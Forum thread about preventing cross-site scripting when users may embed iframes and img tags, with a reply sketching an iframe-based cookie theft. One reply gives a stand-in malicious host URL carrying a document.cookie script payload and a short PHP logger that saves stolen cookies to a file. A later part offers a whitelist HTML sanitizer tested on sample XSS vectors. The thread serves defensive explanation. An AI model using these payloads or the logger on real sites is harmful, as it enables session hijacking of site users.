3 Contributors, 4 Replies, 27 Views, 3 Years Discussion Span, Last Post by woodenduck

You Need a Security Encoding Library. Writing these encoders is not tremendously difficult, but there are quite a few hidden pitfalls.


This can probably be prevented, but I haven't really found any 100% eradication solution for an iframe. For example, if you are allowing your user to do this

<iframe src="http://maliciousSitDotCom/hackTheHack.php"></iframe> 

and on the remote server hackTheHack.php contains this

http://maliciousSitDotCom/getVictimCookie.php?email=<script>alert(document.cookie)</script>

the malicious site can then steal the credentials of the unsuspecting users on the site. They are not aware that their credentials were stolen by the remote script called getVictimCookie.

getVictimCookie.php can be written as simply as

<?php

// Malicious logger: appends whatever arrives in the "email" parameter to a text file.
$file = 'stolenCookie.txt';

if (isset($_GET['email'])) {
    // Read what has been collected so far (empty on the first hit, when the file does not exist yet).
    $sweetCookies = file_exists($file) ? file_get_contents($file) : '';

    $sweetCookies .= "New Victim\n";

    $sweetCookies .= $_GET['email'] . "\n";

    file_put_contents($file, $sweetCookies);
}

The remote server's hackers can then pretend to be your unsuspecting user, using the stolen credentials for whatever the cookies would reveal.

Last thoughts: don't even use it. If they have to add content to your site, let them add it as a link. That should free you from all responsibility and conscience overload.

If you really want to have their page included on your site, then you can use an HTML DOM parser, parse the page, clean it up really well, create a fresh copy of the remote page (the clean one) on your server, and then deliver it to your own iframe. At least you will have full control over which tags are allowed.

Edited by veedeoo: info added


Thanks veedeoo,

You pointed me in the right direction. I found some posts talking about making a whitelist array, then parsing the user-submitted material and verifying that the src domain is in the whitelist array.

How would you go about making sure img tags are secure? I don't think whitelisting any websites or whitelisting file types would be the answer here. Or am I overthinking that and that's exactly what I need?
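The approach veedeoo sketches (parse with a DOM parser, keep only acceptable tags) and the src-domain whitelist woodenduck found can be combined in one server-side sanitizer. The following is an added example written for this thread, not code posted by either participant: it uses PHP's built-in DOMDocument, and the ALLOWED_* lists, the function names and the sample input are assumptions chosen for illustration.

```php
<?php
// Added example (not from the thread): whitelist sanitizer for user-submitted HTML.
// The ALLOWED_* lists and the sample input below are assumptions for illustration.
declare(strict_types=1);

const ALLOWED_TAGS = ['p', 'b', 'i', 'a', 'img', 'iframe'];
const ALLOWED_ATTRS = [
    'a'      => ['href'],
    'img'    => ['src', 'alt'],
    'iframe' => ['src', 'width', 'height'],
];
// Hypothetical hosts an <iframe> may embed; any other iframe is dropped entirely.
const ALLOWED_IFRAME_HOSTS = ['www.youtube.com', 'player.vimeo.com'];

/** True only for absolute http(s) URLs, optionally restricted to $allowedHosts. */
function urlIsSafe(string $url, ?array $allowedHosts = null): bool
{
    $parts = parse_url(trim($url));
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return false; // relative URLs, javascript:, data:, vbscript: all fail here
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    if ($allowedHosts !== null
        && !in_array(strtolower($parts['host']), $allowedHosts, true)) {
        return false;
    }
    return true;
}

/** Parses $dirty, keeps only whitelisted tags/attributes and vetted URLs, re-serialises. */
function sanitizeHtml(string $dirty): string
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // user HTML is rarely well-formed
    // The XML prologue tells libxml the input is UTF-8; the wrapper div gives one root to serialise.
    $doc->loadHTML('<?xml encoding="utf-8"?><div id="root">' . $dirty . '</div>');
    libxml_clear_errors();
    $root = $doc->getElementById('root');
    if ($root === null) {
        return '';
    }

    // Snapshot first: the node list is live and nodes are removed while iterating.
    foreach (iterator_to_array($root->getElementsByTagName('*'), false) as $el) {
        $tag = strtolower($el->tagName);
        if (!in_array($tag, ALLOWED_TAGS, true)) {
            $el->parentNode->removeChild($el); // script, style, object, ... and their content
            continue;
        }
        foreach (iterator_to_array($el->attributes, false) as $attr) {
            $name = strtolower($attr->name);
            if (!in_array($name, ALLOWED_ATTRS[$tag] ?? [], true)) {
                $el->removeAttribute($attr->name); // drops every on* handler, style, etc.
                continue;
            }
            if ($name === 'src' || $name === 'href') {
                $hosts = ($tag === 'iframe') ? ALLOWED_IFRAME_HOSTS : null;
                if (!urlIsSafe($attr->value, $hosts)) {
                    // Remove the whole element so an img/iframe never points at an unvetted source.
                    $el->parentNode->removeChild($el);
                    continue 2;
                }
            }
        }
    }

    $clean = '';
    foreach ($root->childNodes as $child) {
        $clean .= $doc->saveHTML($child);
    }
    return $clean;
}

// Constructed sample: the thread's malicious iframe next to benign markup and classic XSS vectors.
$sample = '<p onmouseover="alert(1)">Hello <b>world</b></p>'
    . '<script>alert(document.cookie)</script>'
    . '<iframe src="http://maliciousSitDotCom/hackTheHack.php"></iframe>'
    . '<iframe src="https://www.youtube.com/embed/abc123" width="560"></iframe>'
    . '<img src="javascript:alert(document.cookie)" alt="x">'
    . '<img src="https://example.org/cat.png" alt="cat" onerror="alert(1)">';

echo sanitizeHtml($sample), PHP_EOL;
```

Two points on the img question raised above. Once every on* attribute is stripped and src is limited to absolute http(s) URLs, an img tag cannot execute script, so a host whitelist is not required for safety the way it is for iframes; what a remote image can still do is disclose each visitor's IP address and referrer to whoever runs the image host, which is a privacy decision rather than an XSS one. Run the sanitizer on the stored copy before it is served, never only on the client, and keep the whitelists as short as the feature allows.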
